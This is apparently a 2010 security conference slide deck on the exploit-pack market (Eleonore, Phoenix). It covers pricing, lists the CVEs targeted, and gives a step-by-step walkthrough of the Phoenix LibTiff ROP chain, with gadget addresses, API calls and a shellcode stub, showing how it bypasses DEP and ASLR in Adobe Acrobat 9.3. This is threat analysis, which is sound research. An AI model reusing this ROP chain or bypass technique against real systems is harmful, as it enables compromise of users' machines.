  • 11. – June 2010, Eleonore v.1.4.1 being sold by its author for $2000 • Rebuild at a different domain / IP = $ 50 • Updates = from $ 100 • Bundle-bound domain 11 10/5/2010 Copyright 2010. All Rights Reserved.
  • 12. • Phoenix Exploits and Shellcode – Exploit List – Metasploit Appropriation and Effectiveness • Libtiff Exploitation – Stack BoF SecurityFocus, Tavis Ormandy 2006 – Metasploit - Windows XP SP3, DEP, ASLR – Updates and Support – Outside Development and Input 12 10/5/2010 Copyright 2010. All Rights Reserved.
  • 13. • Phoenix Exploits and Shellcode – Acrobat LibTiff CVE-2010-0188 Metasploit rip, replaced – Acrobat newPlayer CVE-2009-4324 – JDK CVE-2008-5353 – JAVA GSB CVE-2009-3867  Metasploit rip – MDAC (MS06-014) CVE-2006-0003 – SnapShot ActiveX CVE-2008-2463 – IE Peers CVE-2010-0806  Metasploit rip – Acrobat util.printf CVE-2008-2992 – Acrobat CollectEmailInfo CVE-2007-5659 – Acrobat CollabgetIcon CVE-2009-0927 – Flash CVE-2007-0071 – Flash AVM2 CVE-2009-1869 13 10/5/2010 Copyright 2010. All Rights Reserved.
  • 14. • Pricing, Updates and Support – Single Domain License ~2000WMZ – Updates and domain rebuilds to evade blacklist additions: ~50WMZ – Suggest >35% “punching” – V2.2 contained 12 exploits, sold with guarantee of continuous improvements – Delivering on guarantee, v2.3 arrived in late July with improved Libtiff exploit, effectively evading DEP and ASLR 14 10/5/2010 Copyright 2010. All Rights Reserved.
  • 15. • ROP - Phoenix Libtiff Exploit – Client Side Target over 200 Mb Compiled Code • Adobe Acrobat 9.3 and LibTiff, Open Source – Libtiff v3.8.1 Vulnerability circa 2006 – Exploitation • DEP and ASLR Evasion – ROP • Strategy • Unique ROP Implementation – Traditional Shellcode Payload 15 10/5/2010 Copyright 2010. All Rights Reserved.
  • 16. • Client Side Target – Adobe Acrobat 9.3 • “To date, more than 500 million copies of Adobe Reader have been distributed worldwide on 23 platforms and in 33 languages.” • DEP and ASLR on Vista, Win7 – PDF Format • Pdfdigger, Deflate – escript.api • Objects, Methods, Properties • Compressed 1,500 line script – AcroForm.api • Libtiff and embedded files 16 10/5/2010 Copyright 2010. All Rights Reserved.
  • 17. • Client Side Target – ASLR, Permanent DEP • RSA Crypto-C ME 2 • IBM International Components for Unicode 17 10/5/2010 Copyright 2010. All Rights Reserved.
  • 18. • Phoenix Libtiff ROP – Strategy • GetESP, Allocate, Copy, Jump – Unique ROP Implementation vs. Previously Documented • DEP evasion in 15 return chain links • writeprocessmemory, séance? 18 10/5/2010 Copyright 2010. All Rights Reserved.
  • 19. AcroForm.api… Esp -> 0x080c 0c00 0x20cb 5a5a: 0xffff ffff xor eax, eax icucnv36.4a80 1f90 leave icucnv36.4a84 9038 (&kernel32.CreateFileMapping) retn icucnv.4a80 7e7d 0xffff ffff 19 10/5/2010 Copyright 2010. All Rights Reserved.
  • 20. Esp -> 0x080c 0c00 0x20cb 5a5a: xor eax, eax 0xffff ffff leave icucnv36.4a80 1f90 retn icucnv36.4a84 9038 (&kernel32.CreateFileMapping) icucnv.4a80 7e7d 0xffff ffff 0xffff ffff 20 10/5/2010 Copyright 2010. All Rights Reserved.
  • 21. 0x20cb 5a5a: 0x080c 0c00 xor eax, eax 0xffff ffff leave Esp -> icucnv36.4a80 1f90 retn icucnv36.4a84 9038 (&kernel32.CreateFileMapping) icucnv.4a80 7e7d 0xffff ffff 0xffff ffff 21 10/5/2010 Copyright 2010. All Rights Reserved.
  • 22. 0x20cb 5a5a: 0x080c 0c00 xor eax, eax leave 0xffff ffff retn icucnv36.4a80 1f90 0x4a80 1f90: Esp -> icucnv36.4a84 9038 (&kernel32.CreateFileMapping) pop eax icucnv.4a80 7e7d 0xffff ffff retn 0xffff ffff 22 10/5/2010 Copyright 2010. All Rights Reserved.
  • 23. 0x20cb 5a5a: 0x080c 0c00 xor eax, eax leave 0xffff ffff retn icucnv36.4a80 1f90 0x4a80 1f90: icucnv36.4a84 9038 (&kernel32.CreateFileMapping) pop eax icucnv.4a80 7e7d 0xffff ffff retn Esp -> 0xffff ffff 0x4a80 7e7d: call near dword ptr [eax] eax = &kernel32.CreateFileMapping 23 10/5/2010 Copyright 2010. All Rights Reserved.
  • 24. Esp -> 0xffff ffff 0x4a80 7e7d: call near dword ptr [eax] 0x0000 0000 CreateFileMapping(0xffffffff,0x00000000, 0x0000 0040 0x00000040,0x00001000,0x00000000) 0x0000 0000 retn (PAGE_EXECUTE_READWRITE) 0x0000 ffff 0xffff 1000 0x0000 0000 24 10/5/2010 Copyright 2010. All Rights Reserved.
  • 25. 0x0000 0000 0x4a80 7e7d: call near dword ptr [eax] 0x0000 0040 CreateFileMapping(0xffffffff,0x00000000, 0x0000 0000 0x00000040,0x00001000) 0x0000 1000 retn 0x0000 0000 0xffff ffff Esp -> 0x4a80 1063 25 10/5/2010 Copyright 2010. All Rights Reserved.
  • 26. 0x4a80 1063: pop ebp Esp -> 0x0f60 2020 retn 0x4a80 13df 0x0000 0001 26 10/5/2010 Copyright 2010. All Rights Reserved.
  • 27. 0x4a80 1063: pop ebp 0x0f60 2020 retn Esp -> 0x4a80 13df 0x0000 0001 27 10/5/2010 Copyright 2010. All Rights Reserved.
  • 28. 0x4a80 1063: pop ebp 0x0f60 2020 retn 0x4a80 13df 0x4a80 13df: Esp -> 0x0000 0001 leave retn 28 10/5/2010 Copyright 2010. All Rights Reserved.
  • 29. 0x4a80 1063: leave Esp -> 0x4a80 63a5 retn 0x0f60 203c 0x4a80 13df: 0x4a80 2196 leave retn 29 10/5/2010 Copyright 2010. All Rights Reserved.
  • 30. 0x4a80 13df: leave retn Esp -> 0x0f60 203c 0x4a80 203c: 0x4a80 2196 leave 0x4a80 1f90 retn 0x4a80 9030 0x4a80 63a5: &kernel32.MapViewofFile pop ecx retn 30 10/5/2010 Copyright 2010. All Rights Reserved.
  • 31. 0x4a80 13df: leave retn 0x0f60 203c 0x4a80 203c: Esp -> 0x4a80 2196 leave 0x4a80 1f90 retn 0x4a80 9030 0x4a80 63a5: &kernel32.MapViewofFile pop ecx retn 31 10/5/2010 Copyright 2010. All Rights Reserved.
  • 32. 0x4a80 2196: 0x4a80 9f90 mov dword ptr [ecx], eax Esp -> 0x4a80 1f90 retn 0x4a80 9030 &kernel32.MapViewOfFile 0x4a80 9030 32 10/5/2010 Copyright 2010. All Rights Reserved.
  • 33. 0x4a80 2196: 0x4a80 9f90 mov dword ptr [ecx], eax Esp -> 0x4a80 1f90 retn 0x4a80 9030 &kernel32.MapViewOfFile 0x4a80 7e7d 33 10/5/2010 Copyright 2010. All Rights Reserved.
  • 34. 0x4a80 1f90: 0x4a80 9f90 pop eax ; POKE GADGET 0x4a80 1f90 retn Esp -> 0x4a80 9030 &kernel32.MapViewOfFile 0x4a80 7e7d 34 10/5/2010 Copyright 2010. All Rights Reserved.
  • 35. Esp -> 0x4a80 7e7d 0x4a80 1f90: 0x0000 00fc pop eax 0x0000 0026 retn 0x0000 0000 0x4a80 7e7d: 0x0000 0000 call [eax] ret 0x4a80 8871 35 10/5/2010 Copyright 2010. All Rights Reserved.
  • 36. 0x4a80 1f90: 0x0000 00fc Esp -> pop eax 0x0000 0026 retn 0x4a80 7e7d: 0x0000 0000 call [eax] 0x0000 0000 kernel32.MapViewOfFile 0x4a80 8871 ret 36 10/5/2010 Copyright 2010. All Rights Reserved.
  • 37. 0x4a80 1f90: 0x0000 00fc pop eax 0x0000 0026 retn 0x0000 0000 0x4a80 7e7d: 0x0000 0000 call [eax] kernel32.MapViewOfFile ret Esp -> 0x4a80 8871 37 10/5/2010 Copyright 2010. All Rights Reserved.
  • 38. 0x4a80 8871: Esp -> dest = 0x024f 0000 push eax call <&jmp.memcpy> ;copy payload src = 0x0f60 2064 blob to CreateFileMapping memory page add esp, 0x0c n = 0x0000 0400 mov eax, esi 0x4141 4141 pop esi pop edi 0x4141 4141 leave ret 0x9090 9090 38 10/5/2010 Copyright 2010. All Rights Reserved.
  • 39. 0x4a80 8871: Esp -> 0x024f 0000 push eax call <&jmp.memcpy> 0x0f60 2064 add esp, 0x0c 0x0000 0400 mov eax, esi pop esi 0x4141 4141 pop edi 0x4141 4141 leave ret 0x9090 9090 39 10/5/2010 Copyright 2010. All Rights Reserved.
  • 40. 0x024f 0000: Esp -> 0x024f 0000 nop ;start of traditional 0x0f60 2064 Xor’d shellcode payload stub 0x0000 0400 nop 0x4141 4141 nop nop 0x4141 4141 jmp short 0x024f 001c 0x9090 9090 40 10/5/2010 Copyright 2010. All Rights Reserved.
  • 41. • Bridge to traditional payload • DEP Evasion = – AcroForm.api, Msvcr80.dll, icucnv36.dll, allocated executable memory space via file mapping and view – Return chain of 15 links – CreateFileMapping + MapViewOfFile + memcpy + relative jmp (0xeb 16) 41 10/5/2010 Copyright 2010. All Rights Reserved.
  • 42. 42 10/5/2010 Copyright 2010. All Rights Reserved.
  • 43. • Exploit packs continue to be prevalent and a relevant threat • The exploit pack marketplace is continually growing and changing • Much of the exploit pack marketplace is predictable • ROP shellcoding techniques are a novel, recent phenomenon for the commodity exploit pack marketplace • The latest defensive technology OS implementation successes are being evaded by "generic" attacks 43 10/5/2010 Copyright 2010. All Rights Reserved.
  • 44. Libtiff vulnerability (CVE-2006-3459) http://downloads.securityfocus.com/vulnerabilities/exploits/19283.c http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3459 http://www.adobe.com/support/security/bulletins/apsb10-07.html Data Execution Prevention (DEP - Hardware and Software based) http://support.microsoft.com/kb/875352 Address Space Load Randomization (ASLR) http://technet.microsoft.com/en-us/magazine/2007.04.vistakernel.aspx Metasploit “Adobe Acrobat Bundled LibTIFF Integer Overflow”, villy, jduck Return Oriented Exploitation, Dino Dai Zovi, Blackhat 2010 https://media.blackhat.com/bh-us-10/presentations/Zovi/BlackHat-USA-2010-DaiZovi-Return-Oriented-Exploitation-slides.pdf Malware Intelligence Blog, Jorge Mieres http://malwareint.blogspot.com/2010/09/phoenix-exploits-kit-v21-inside.html 44 10/5/2010 Copyright 2010. All Rights Reserved.